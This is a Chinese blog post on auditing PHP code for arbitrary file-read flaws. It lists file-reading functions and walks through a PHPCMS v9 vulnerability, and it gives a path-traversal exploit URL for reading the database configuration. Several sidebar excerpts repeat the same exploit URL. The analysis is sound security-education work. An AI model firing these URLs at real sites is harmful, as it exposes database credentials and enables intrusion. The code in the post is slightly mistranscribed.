PHP-代码审计-文件读取(下载)

最新推荐文章于 2022-05-22 21:08:15 发布
最新推荐文章于 2022-05-22 21:08:15 发布
阅读量266 收藏
点赞数
分类专栏: php代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44110913/article/details/108265696
版权

概述

  • 部分程序在下载或者读取显示文件的时候,读取文件的参数filename直接在请求里面传递,后台程序获取到这个文件路径后直接读取返回

挖洞经验

  • 文件读取的漏洞寻找起来比较容易一种方式是可以先黑盒测试功能点对应的文件,再去读文件,这样找起来比较快。
  • 另一种方式就是搜索文件读取的函数,看看有没有直接或者间接控制的变量。文件读取函数如下:
    file_get_contents()
    highlight_file()
    fopen()
    readfile()
    fread()
    fgetss()
    fgets()
    parse_ini_file()
    show_source()
    file()
  • 除了这些正常的读取文件的函数之外,另外一些其他功能的函数也一样可以读取文件,
  • 比如文件的函数之外,另外一些其他函数也一样可以读取文件,如文件包含函数 include PHP输入输出流 php://filter来读取文件

phpcms任意文件读取分析
代码如下:

public function public_get_suggest_keyword(){
	$url=$GET['url'].'&q='.$GET['q'];
	$res=@file_get_contents($url);
	if(CHARSET != 'gbk'){
		$res=iconv('gbk',CHARSET,$res);
}

	echo $res;
}
  • 这里可以看到该函数直接从GET参数里面获取要读取的url,然后使用file_get_contens函数来读取内容,
  • 不过这里要说一点,如果直接提交?url=&q=1.php ,我们打印出来的url变量可以看到值为" &q=1.php",带到函数里面则是file_get_contents(" &q=1.php"),这样就读不到当前文件
  • 需要 ?url=&q=…/…/1.php 这样多加两个“ …/”,吧“&q=” 当成目录来跳过,最终这个漏洞读取数据库配置文件的exp为:
  • /index.php/phpcmsv9gbk//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=…/…/phpssp_server/caches/configs
Mamba start
关注
专栏目录
代码审计:ourphp 后台任意文件读取复现
qq_43233085的博客
03-15 679
代码审计:ourphp 后台任意文件读取复现ourphp代码审计漏洞复现 ourphp OurPHP傲派企业电商建站系统基于PHP+MYSQL完美开发,企业+电商+微信+手机+APP一个平台搞定,支持N国语言建站,外贸网站首选。 官网:http://www.ourphp.net 演示:http://demo.ourphp.net 代码审计 问题出在 \client\manage\ourphp_fi...
代码审计】--- php代码审计方法
qq_43168364的博客
02-11 4719
代码审计需要掌握的点 PHP编程语言的特性和基础 Web前端编程基础 漏洞形成原理 代码审计思路 不同系统、中间件之间的特性差异 代码审计思路 方法一 ---- 检查敏感函数的参数,然后回溯变量,判断变量是否可控,并且有没有经过严格的过滤,这是一个逆向追踪的过程 方法二 ---- 找出哪些文件在接收外部传入的参数,然后跟踪变量的传递过程,观察是否有变量传入到高危函数里面,或者传递的过程是否有逻辑漏洞,这是一种正向追踪的方式 方法三 ---- 直接挖掘功能点漏洞,根据自身经验判断该类应用通常在哪些功能中
php代码审计之任意文件读取漏洞
cj_Hydra's Blog
02-21 2106
前言: 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取的配置信息甚至系统重要文件,当然,严重的话, 就可能导致SSRF,进而漫游内网。 代码审计: 这次审计的代码,还是之前的一个审计靶场,个人说过是比较适合初级审计人员的一个靶场,里面包含了常见的漏洞。废话不多说,看步骤。 第一步:首先我们通过全文搜索的方式搜索:file_get_contents结果搜索到了一个名为user/a...
php代码审计任意文件读取删除
qq_42307546的博客
05-22 112
php代码审计(一)-----调试函数
wkend的博客
04-03 419
两种最基本的输出方法echo和print /** *echo 是一个语言结构,有无括号均可使用:echo 或 echo() */ //打印字符串 echo "hello"; echo("hello"); //打印变量 $text="learn php"; echo $text; echo($text); /** print 也是语言结构,有无括号均可使用:print 或 pr...
PHP代码审计文件包含
秋水的博客
09-08 1611
目录 漏洞简介 漏洞实现 文件包含之伪协议 漏洞实例 漏洞防御 漏洞简介 什么是文件包含? 在之前接触的python中,我们会通过import来导入一些公共资源 在PHP中,也有类似的函数,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码 文件包含分文本地文件包含(Loacl File Inclusion,LFI...
【基础篇】第08篇:PHP代码审计笔记--任意文件下载漏洞1
08-03
PHP代码审计笔记--任意文件下载漏洞1 该漏洞是由于文件名及路径由客户端传入的参数控制,并且未进行有效的过滤,导致用户可恶意下载任意文件。攻击者可以提交url:test.php?filename=test.php,即可下载test.php...
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
在网络安全领域,代码审计是确保应用程序安全性的重要环节。本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL...
php代码审计入坑实践.pdf
07-30
总的来说,PHP代码审计是一个复杂但至关重要的过程,它涉及到理解代码逻辑、寻找潜在的安全风险,以及利用工具进行自动化辅助。这篇文章为初学者提供了一个实用的起点,通过实践操作来提升对代码审计的理解。然而,...
代码审计】xyhcms3.5后台任意文件读取1
08-03
代码审计】xyhcms3.5 后台任意文件读取漏洞详解 在网络安全领域,代码审计是一项至关重要的工作,它能帮助开发者发现并修复潜在的安全问题。本文将深入探讨xyhcms3.5中一个特定的任意文件读取漏洞,该问题存在于...
PHP相关系列 - 某开源php软件的一个安全漏洞所想
自娱自乐的代码人
10-23 2670
早上看到某开源php软件爆出这么一个漏洞: http://www.xxxx.net//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php 以上网址为phpcms的应用程序 然后基本你的数据库密码就沦陷了。
phpcms模板嵌入php代码_代码审计文件操作漏洞
weixin_39796868的博客
11-25 2318
文件操作包括文件包含、文件读取文件删除、文件修改以及文件上传,这几种文件操作的漏洞有部分的相似点,但是每种漏洞都有各自的漏洞函数以及利用方式,下面我们来具体分析下它们的形成原因、挖掘方式以及修复方案。1. 文件包含漏洞PHP文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的,只要能正常执行即可。文件包含又分为本地文件包含(local file include)和远程文件包含(rem...
PHPCMS V9.1.13任意文件包含漏洞分析
收集盒 Book box
07-31 3346
最近爆出了PHPCMS V9.1.13任意文件包含漏洞,新版本(v9.1.16)已经针对该漏洞做了修复。 下载PHPCMS V9.1.13,解压。 这里我就用Linux天生具备的高效分析能力去快速定位存在漏洞的函数。就懒得找入口点看代码了。 首先我们看触发漏洞的url:/index.php?m=search&c=index&a=public_g
PHPCMS V9 任意文件读取漏洞
收集盒 Book box
01-03 2050
test demo : http://v9.demo.phpcms.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php 升级到最新版本 sebug 临时解决方案: 禁止mysql数据库外链. 给数据库单独
PHP代码审计基础:任意文件读取及删除漏洞
1匹黑马
12-03 1200
文章目录任意文件读取危害挖掘思路测试代码任意文件删除危害 任意文件读取 通过提交专门设计的 输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件 危害 任意文件读取,是Web安全中的高危漏洞,它可以泄露源码,数据库配置文件等等,导致网站处于极度不安全的状态 挖掘思路 fopen() file_get_contents() fread() fgets() fgetss()
PHP代码审计】XSS后台敏感操作、文件包含漏洞审计、任意文件读取
weixin_44722125的博客
08-11 692
XSS 看源码只有SQL的过滤没有XSS的过滤 所以我们可以插入任意XSS代码,找出login_ip字段看允许我们输入多少个字符,还需要知道管理员可以做些什么,我们的XSS攻击需要以管理员身份去执行。 字段长度限制为255个字符,所以我们可以在登陆时构造payload,一般都是执行远程js文件,让他可以执行更多的操作。 准备好攻击payload: 找到管理员可以执行的操作 构造paylo...
代码审计】任意文件读取漏洞实例
04-15 418
0x00 前言   大多数网站都提供读取文件功能,一般实现过程是,根据参数filename的值,获得该文件在网站上的绝对路径,读取文件。   这里,通过两个任意文件读取漏洞实例去展示漏洞原理、漏洞危害。 0x01 漏洞实例一 环境搭建: XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源...
PHPCMS v9.6.0版任意文件上传漏洞分析笔记
foolisheddy
05-05 4902
PHPCMS v9.6.0版任意文件上传漏洞分析笔记 PHPCMS v9.6.0版任意文件上传漏洞分析笔记 参考: 安装: 漏洞复现: 漏洞分析: index.php member/index.php 正常请求 register()函数: htmlspecialchars()函数: menberinput−>get(menberinput−>get(menber_input->g...
phpcmsv9.15以下任意文件读取漏洞
weixin_33969116的博客
11-03 265
http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php成功读取数据库信息如下:爆网站路径:http://www.xx.com/index.php?m=sear...
PHP代码审计:RCE、文件操作与安全漏洞解析
"本文主要探讨了PHP项目中的代码审计,重点关注了远程代码执行(RCE)、文件包含、下载和删除漏洞。这些漏洞与SQL注入、XSS跨站脚本、文件包含漏洞、代码执行、命令执行、变量覆盖、反序列化以及其他潜在的安全问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值